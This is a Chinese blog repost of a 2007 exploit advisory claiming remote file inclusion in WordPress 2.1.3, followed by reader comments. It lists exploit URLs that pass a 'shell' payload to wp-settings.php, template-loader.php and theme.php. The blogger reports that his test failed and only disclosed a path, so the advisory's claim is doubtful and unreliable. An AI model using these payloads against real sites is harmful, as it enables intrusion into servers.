WordPress v2.1.3 >> remote file include
鬼仔注:前两天看到的,一直考虑要不要放上来,因为我测试没有成功,只是爆出了物理路径(文章末尾附图)。有测试成功的说明下。
来源:SecurityFocus
by : www.hackeraz.ir userz , saeid…
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk …………..: high #
Date ………: 25/4/2007 #
Found by ……….: s433d_only_linux #
Contact ………..: s433d_only_linux (at) yahoo (dot) de [email concealed] #
Web ………….: Www.hackerz.ir #
special thanx ……….. Ali Jasbi my beste friend#
###############################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
###############################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
###############################################
鬼仔会德文--?
:mad: PHP.INI
allow_url_include OFF了? :???:
@炎藤 不会德文啊
@茄子宝 不清楚,我随手找了个测试了下
你好,你用的wordpress模板很漂亮~ 请问哪里可以下载?